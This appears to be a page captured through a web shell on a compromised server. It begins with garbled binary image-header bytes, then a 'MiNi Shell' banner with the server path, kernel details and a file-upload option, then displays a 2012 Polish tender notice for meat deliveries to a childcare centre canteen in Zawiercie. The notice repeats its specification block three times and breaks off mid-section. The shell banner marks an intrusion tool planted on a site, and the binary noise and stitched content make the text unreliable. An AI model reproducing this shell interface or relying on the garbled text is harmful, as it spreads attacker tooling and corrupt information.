JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120109/6465-N-2012.html

<p class="kh_header"><b>Zawiercie: zakup i dostarczenie mięsa i wędlin na potrzeby stołówki Ośrodka Usług Opiekuńczo - Wychowawczych w Zawierciu</b><br>
<b>Numer ogłoszenia: 6465 - 2012; data zamieszczenia: 09.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Usług Opiekuńczo-Wychowawczych w Zawierciu , ul. Daszyńskiego 4, 42-400 Zawiercie, woj. śląskie, tel. 032 6721932, faks 032 6721932.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.ouow.zawiercie.powiat.finn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup i dostarczenie mięsa i wędlin na potrzeby stołówki Ośrodka Usług Opiekuńczo - Wychowawczych w Zawierciu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa mięsa i wędlin na potrzeby stołówki Ośrodka Usług Opiekuńczo - Wychowawczych w Zawierciu.
Wspólny słownik Zamówień:  15100000-9
Mięso i wędliny muszą być świeże, nie mrożone, dopuszczone do konsumpcji przez lekarza weterynarii, dostarczone własnym transportem po uprzednim telefonicznym zamówieniu przez upoważnionego pracownika placówki do stołówki Ośrodka.
Przy każdej dostawie musi być doręczony dokument stwierdzający pochodzenie towaru  i jego dopuszczenie do obrotu.
Ilość potrzebna na każdy dzień umawiana jest ustnie, telefonicznie przez Zamawiającego. 
Wszystkie produkty powinny być kategorii I i być przydatne do spożycia.
Ogólna ilość zamówienia może się zmienić, nie jesteśmy w stanie określić ilości przygotowywanych posiłków w całym okresie trwania umowy.
Wszystkie dostarczone artykuły muszą spełniać wymagania HACCP.
Zamawiający nie dopuszcza składania ofert częściowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotem zamówienia jest zakup i dostawa mięsa i wędlin na potrzeby stołówki Ośrodka Usług Opiekuńczo - Wychowawczych w Zawierciu.Wspólny słownik Zamówień:  15100000-9 Mięso i wędliny muszą być świeże, nie mrożone,dopuszczone do konsumpcji przez lekarza weterynarii, dostarczone własnym transportem po uprzednim telefonicznym zamówieniu przez upoważnionego pracownika placówki do stołówki Ośrodka.Przy każdej dostawie musi być doręczony dokument stwierdzający pochodzenie towaru  i jego dopuszczenie do obrotu. Ilość potrzebna na każdy dzień umawiana jest ustnie, telefonicznie przez Zamawiającego. Wszystkie produkty powinny być kategorii I i być przydatne do spożycia.Ogólna ilość zamówienia może się zmienić, nie jesteśmy w stanie określić ilości przygotowywanych posiłków w całym okresie trwania umowy.Wszystkie dostarczone artykuły muszą spełniać wymagania HACCP zamawiający nie dopuszcza składania ofert częściowych.TERMIN WYKONANIA ZAMÓWIENIA Zamówienie musi zostać zrealizowane w terminie: do 31.12.2012r WARUNKI UDZIAŁU W POSTĘPOWANIU W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz. U. z 2007 r. nr 223, poz. 1655 z późn. zm.), spełniający warunki i wymagania określone w Specyfikacji Istotnych warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
Wykonawcy biorący udział w postępowaniu muszą spełniać następujące warunki:
wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy    z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych.
SPOSÓB POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI:Wyjaśnienia dotyczące Specyfikacji Istotnych Warunków Zamówienia udzielane będą z zachowaniem zasad określonych w ustawie Prawo Zamówień Publicznych (art. 38).
W niniejszym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie lub faksem. Wybrany sposób przekazywania oświadczeń, wniosków, zawiadomień oraz informacji nie może ograniczać konkurencji; zawsze dopuszczalna jest forma pisemna, z zastrzeżeniem wyjątków przewidzianych w ustawie.
Osoby uprawnione do kontaktów z wykonawcami są:w zakresie proceduralnym osobami upoważnionymi do kontaktu z Wykonawcami są: członek komisji Beata Imiolczyk - referent    tel. 0-32 67-219-32 członek komisji Dorota Mazur - magazynier tel. 0-32 67-219-32
w zakresie merytorycznym osobą upoważnioną do kontaktu  z Wykonawcami jest:
Elżbieta Kołodziej - Dyrektor placówki tel. 0-32 67-219-32
TERMIN ZWIĄZANIA OFERTĄ:
Wykonawca zostaje związany ofertą przez okres 30 dni.
Bieg terminu związania ofertą rozpoczyna się z upływem terminu składania ofert.
OPIS SPOSOBU PRZYGOTOWANIA OFERTY:
Wykonawca może złożyć tylko jedną ofertę, na wybrane zamówienie.
W przypadku unieważnienia postępowania o udzielenie zamówienia z przyczyn leżących po stronie Zamawiającego, Wykonawcom, którzy złożyli oferty,            nie przysługuje roszczenie o zwrot uzasadnionych kosztów uczestnictwa                w postępowaniu.
Oferta wraz ze stanowiącymi jej integralną część załącznikami musi być sporządzona przez Wykonawcę ściśle według postanowień niniejszej Specyfikacji.
Oferta musi być napisana w języku polskim, na komputerze, maszynie do pisania lub ręcznie długopisem bądź niezmywalnym atramentem.
Proponuje się, aby wszystkie zapisane strony oferty wraz z załącznikami były kolejno ponumerowane oraz na każdej stronie podpisane przez osobę (osoby) uprawnione do składania oświadczeń woli w imieniu Wykonawcy, przy czym      co najmniej na pierwszej i ostatniej stronie oferty podpis (podpisy) był opatrzony pieczęcią imienną wykonawcy. Pozostałe strony oferty mogą być parafowane.
Wszelkie poprawki lub zmiany w tekście oferty muszą być parafowane przez osobę (osoby) podpisujące ofertę i opatrzone datami ich dokonania.
Wykonawca nie może powierzyć podwykonawcom zamówienia.
Do ofert należy dołączyć następujące dokumenty i oświadczenia:
Koncesja, zezwolenie lub licencja	Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia     lub licencji na podjecie działalności gospodarczej w zakresie objętym zamówieniem publicznym.
Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia               do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie              do udziału w postępowaniu              o udzielenie zamówienia albo składania ofert.
Zaświadczenie, iż przedmiot zamówienia odpowiada normom	Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającej, że dostarczone produkty odpowiadają określonym normom lub specyfikacjom technicznym
Wskazane dokumenty mogą być doręczone w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów.
Jeżeli w określonym terminie Wykonawca nie złoży oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub jeżeli złoży dokumenty zawierające błędy, Zamawiający wezwie go do ich uzupełnienia                 w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy będzie podlegać odrzuceniu lub konieczne będzie unieważnienie postępowania. Uzupełniane dokumenty lub oświadczenia powinny spełniać warunki określone w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych (Dz.U. z 2007 r. nr 223,poz. 1655 z późn. zm.). Zamawiający może także w wyznaczonym przez siebie terminie , wezwać do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.
Wykonawca umieszcza ofertę w zamkniętej kopercie oznaczonej nazwą i adresem wykonawcy oraz opisem przedmiotu zamówienia w sposób następujący:
OFERTA NA ZAKUP I DOSTARCZENIE MIESA I WĘDLIN NA POTRZEBY STOŁÓWKI OŚRODKA USŁUG OPIEKUŃCZO - WYCHOWAWCZYCH W ZAWIERCIU
Wykonawca może wprowadzić zmiany lub wycofać złożoną przez siebie ofertę wyłącznie przed terminem składania ofert i pod warunkiem, że przed upływem tego terminu Zamawiający otrzyma pisemne powiadomienie o wprowadzeniu zmian lub wycofaniu oferty. Powiadomienie to musi być opisane i oznaczone słowami ZMIANA lub WYCOFANIE
Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 89      ust. 1 ustawy Prawo Zamówień Publicznych (Dz. U. z 2007 roku Nr 223,           poz. 1655 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotem zamówienia jest zakup i dostawa mięsa i wędlin na potrzeby stołówki Ośrodka Usług Opiekuńczo - Wychowawczych w Zawierciu.Wspólny słownik Zamówień:  15100000-9 Mięso i wędliny muszą być świeże, nie mrożone,dopuszczone do konsumpcji przez lekarza weterynarii, dostarczone własnym transportem po uprzednim telefonicznym zamówieniu przez upoważnionego pracownika placówki do stołówki Ośrodka.Przy każdej dostawie musi być doręczony dokument stwierdzający pochodzenie towaru  i jego dopuszczenie do obrotu. Ilość potrzebna na każdy dzień umawiana jest ustnie, telefonicznie przez Zamawiającego. Wszystkie produkty powinny być kategorii I i być przydatne do spożycia.Ogólna ilość zamówienia może się zmienić, nie jesteśmy w stanie określić ilości przygotowywanych posiłków w całym okresie trwania umowy.Wszystkie dostarczone artykuły muszą spełniać wymagania HACCP zamawiający nie dopuszcza składania ofert częściowych.TERMIN WYKONANIA ZAMÓWIENIA Zamówienie musi zostać zrealizowane w terminie: do 31.12.2012r WARUNKI UDZIAŁU W POSTĘPOWANIU W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz. U. z 2007 r. nr 223, poz. 1655 z późn. zm.), spełniający warunki i wymagania określone w Specyfikacji Istotnych warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
Wykonawcy biorący udział w postępowaniu muszą spełniać następujące warunki:
wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy    z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych.
SPOSÓB POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI:Wyjaśnienia dotyczące Specyfikacji Istotnych Warunków Zamówienia udzielane będą z zachowaniem zasad określonych w ustawie Prawo Zamówień Publicznych (art. 38).
W niniejszym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie lub faksem. Wybrany sposób przekazywania oświadczeń, wniosków, zawiadomień oraz informacji nie może ograniczać konkurencji; zawsze dopuszczalna jest forma pisemna, z zastrzeżeniem wyjątków przewidzianych w ustawie.
Osoby uprawnione do kontaktów z wykonawcami są:w zakresie proceduralnym osobami upoważnionymi do kontaktu z Wykonawcami są: członek komisji Beata Imiolczyk - referent    tel. 0-32 67-219-32 członek komisji Dorota Mazur - magazynier tel. 0-32 67-219-32
w zakresie merytorycznym osobą upoważnioną do kontaktu  z Wykonawcami jest:
Elżbieta Kołodziej - Dyrektor placówki tel. 0-32 67-219-32
TERMIN ZWIĄZANIA OFERTĄ:
Wykonawca zostaje związany ofertą przez okres 30 dni.
Bieg terminu związania ofertą rozpoczyna się z upływem terminu składania ofert.
OPIS SPOSOBU PRZYGOTOWANIA OFERTY:
Wykonawca może złożyć tylko jedną ofertę, na wybrane zamówienie.
W przypadku unieważnienia postępowania o udzielenie zamówienia z przyczyn leżących po stronie Zamawiającego, Wykonawcom, którzy złożyli oferty,            nie przysługuje roszczenie o zwrot uzasadnionych kosztów uczestnictwa                w postępowaniu.
Oferta wraz ze stanowiącymi jej integralną część załącznikami musi być sporządzona przez Wykonawcę ściśle według postanowień niniejszej Specyfikacji.
Oferta musi być napisana w języku polskim, na komputerze, maszynie do pisania lub ręcznie długopisem bądź niezmywalnym atramentem.
Proponuje się, aby wszystkie zapisane strony oferty wraz z załącznikami były kolejno ponumerowane oraz na każdej stronie podpisane przez osobę (osoby) uprawnione do składania oświadczeń woli w imieniu Wykonawcy, przy czym      co najmniej na pierwszej i ostatniej stronie oferty podpis (podpisy) był opatrzony pieczęcią imienną wykonawcy. Pozostałe strony oferty mogą być parafowane.
Wszelkie poprawki lub zmiany w tekście oferty muszą być parafowane przez osobę (osoby) podpisujące ofertę i opatrzone datami ich dokonania.
Wykonawca nie może powierzyć podwykonawcom zamówienia.
Do ofert należy dołączyć następujące dokumenty i oświadczenia:
Koncesja, zezwolenie lub licencja	Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia     lub licencji na podjecie działalności gospodarczej w zakresie objętym zamówieniem publicznym.
Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia               do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie              do udziału w postępowaniu              o udzielenie zamówienia albo składania ofert.
Zaświadczenie, iż przedmiot zamówienia odpowiada normom	Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającej, że dostarczone produkty odpowiadają określonym normom lub specyfikacjom technicznym
Wskazane dokumenty mogą być doręczone w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów.
Jeżeli w określonym terminie Wykonawca nie złoży oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub jeżeli złoży dokumenty zawierające błędy, Zamawiający wezwie go do ich uzupełnienia                 w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy będzie podlegać odrzuceniu lub konieczne będzie unieważnienie postępowania. Uzupełniane dokumenty lub oświadczenia powinny spełniać warunki określone w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych (Dz.U. z 2007 r. nr 223,poz. 1655 z późn. zm.). Zamawiający może także w wyznaczonym przez siebie terminie , wezwać do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.
Wykonawca umieszcza ofertę w zamkniętej kopercie oznaczonej nazwą i adresem wykonawcy oraz opisem przedmiotu zamówienia w sposób następujący:
OFERTA NA ZAKUP I DOSTARCZENIE MIESA I WĘDLIN NA POTRZEBY STOŁÓWKI OŚRODKA USŁUG OPIEKUŃCZO - WYCHOWAWCZYCH W ZAWIERCIU
Wykonawca może wprowadzić zmiany lub wycofać złożoną przez siebie ofertę wyłącznie przed terminem składania ofert i pod warunkiem, że przed upływem tego terminu Zamawiający otrzyma pisemne powiadomienie o wprowadzeniu zmian lub wycofaniu oferty. Powiadomienie to musi być opisane i oznaczone słowami ZMIANA lub WYCOFANIE
Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 89      ust. 1 ustawy Prawo Zamówień Publicznych (Dz. U. z 2007 roku Nr 223,           poz. 1655 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotem zamówienia jest zakup i dostawa mięsa i wędlin na potrzeby stołówki Ośrodka Usług Opiekuńczo - Wychowawczych w Zawierciu.Wspólny słownik Zamówień:  15100000-9 Mięso i wędliny muszą być świeże, nie mrożone,dopuszczone do konsumpcji przez lekarza weterynarii, dostarczone własnym transportem po uprzednim telefonicznym zamówieniu przez upoważnionego pracownika placówki do stołówki Ośrodka.Przy każdej dostawie musi być doręczony dokument stwierdzający pochodzenie towaru  i jego dopuszczenie do obrotu. Ilość potrzebna na każdy dzień umawiana jest ustnie, telefonicznie przez Zamawiającego. Wszystkie produkty powinny być kategorii I i być przydatne do spożycia.Ogólna ilość zamówienia może się zmienić, nie jesteśmy w stanie określić ilości przygotowywanych posiłków w całym okresie trwania umowy.Wszystkie dostarczone artykuły muszą spełniać wymagania HACCP zamawiający nie dopuszcza składania ofert częściowych.TERMIN WYKONANIA ZAMÓWIENIA Zamówienie musi zostać zrealizowane w terminie: do 31.12.2012r WARUNKI UDZIAŁU W POSTĘPOWANIU W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz. U. z 2007 r. nr 223, poz. 1655 z późn. zm.), spełniający warunki i wymagania określone w Specyfikacji Istotnych warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
Wykonawcy biorący udział w postępowaniu muszą spełniać następujące warunki:
wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy    z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych.
SPOSÓB POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI:Wyjaśnienia dotyczące Specyfikacji Istotnych Warunków Zamówienia udzielane będą z zachowaniem zasad określonych w ustawie Prawo Zamówień Publicznych (art. 38).
W niniejszym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie lub faksem. Wybrany sposób przekazywania oświadczeń, wniosków, zawiadomień oraz informacji nie może ograniczać konkurencji; zawsze dopuszczalna jest forma pisemna, z zastrzeżeniem wyjątków przewidzianych w ustawie.
Osoby uprawnione do kontaktów z wykonawcami są:w zakresie proceduralnym osobami upoważnionymi do kontaktu z Wykonawcami są: członek komisji Beata Imiolczyk - referent    tel. 0-32 67-219-32 członek komisji Dorota Mazur - magazynier tel. 0-32 67-219-32
w zakresie merytorycznym osobą upoważnioną do kontaktu  z Wykonawcami jest:
Elżbieta Kołodziej - Dyrektor placówki tel. 0-32 67-219-32
TERMIN ZWIĄZANIA OFERTĄ:
Wykonawca zostaje związany ofertą przez okres 30 dni.
Bieg terminu związania ofertą rozpoczyna się z upływem terminu składania ofert.
OPIS SPOSOBU PRZYGOTOWANIA OFERTY:
Wykonawca może złożyć tylko jedną ofertę, na wybrane zamówienie.
W przypadku unieważnienia postępowania o udzielenie zamówienia z przyczyn leżących po stronie Zamawiającego, Wykonawcom, którzy złożyli oferty,            nie przysługuje roszczenie o zwrot uzasadnionych kosztów uczestnictwa                w postępowaniu.
Oferta wraz ze stanowiącymi jej integralną część załącznikami musi być sporządzona przez Wykonawcę ściśle według postanowień niniejszej Specyfikacji.
Oferta musi być napisana w języku polskim, na komputerze, maszynie do pisania lub ręcznie długopisem bądź niezmywalnym atramentem.
Proponuje się, aby wszystkie zapisane strony oferty wraz z załącznikami były kolejno ponumerowane oraz na każdej stronie podpisane przez osobę (osoby) uprawnione do składania oświadczeń woli w imieniu Wykonawcy, przy czym      co najmniej na pierwszej i ostatniej stronie oferty podpis (podpisy) był opatrzony pieczęcią imienną wykonawcy. Pozostałe strony oferty mogą być parafowane.
Wszelkie poprawki lub zmiany w tekście oferty muszą być parafowane przez osobę (osoby) podpisujące ofertę i opatrzone datami ich dokonania.
Wykonawca nie może powierzyć podwykonawcom zamówienia.
Do ofert należy dołączyć następujące dokumenty i oświadczenia:
Koncesja, zezwolenie lub licencja	Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia     lub licencji na podjecie działalności gospodarczej w zakresie objętym zamówieniem publicznym.
Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia               do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie              do udziału w postępowaniu              o udzielenie zamówienia albo składania ofert.
Zaświadczenie, iż przedmiot zamówienia odpowiada normom	Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającej, że dostarczone produkty odpowiadają określonym normom lub specyfikacjom technicznym
Wskazane dokumenty mogą być doręczone w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów.
Jeżeli w określonym terminie Wykonawca nie złoży oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub jeżeli złoży dokumenty zawierające błędy, Zamawiający wezwie go do ich uzupełnienia                 w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy będzie podlegać odrzuceniu lub konieczne będzie unieważnienie postępowania. Uzupełniane dokumenty lub oświadczenia powinny spełniać warunki określone w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych (Dz.U. z 2007 r. nr 223,poz. 1655 z późn. zm.). Zamawiający może także w wyznaczonym przez siebie terminie , wezwać do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.
Wykonawca umieszcza ofertę w zamkniętej kopercie oznaczonej nazwą i adresem wykonawcy oraz opisem przedmiotu zamówienia w sposób następujący:
OFERTA NA ZAKUP I DOSTARCZENIE MIESA I WĘDLIN NA POTRZEBY STOŁÓWKI OŚRODKA USŁUG OPIEKUŃCZO - WYCHOWAWCZYCH W ZAWIERCIU
Wykonawca może wprowadzić zmiany lub wycofać złożoną przez siebie ofertę wyłącznie przed terminem składania ofert i pod warunkiem, że przed upływem tego terminu Zamawiający otrzyma pisemne powiadomienie o wprowadzeniu zmian lub wycofaniu oferty. Powiadomienie to musi być opisane i oznaczone słowami ZMIANA lub WYCOFANIE
Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 89      ust. 1 ustawy Prawo Zamówień Publicznych (Dz. U. z 2007 roku Nr 223,           poz. 1655 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
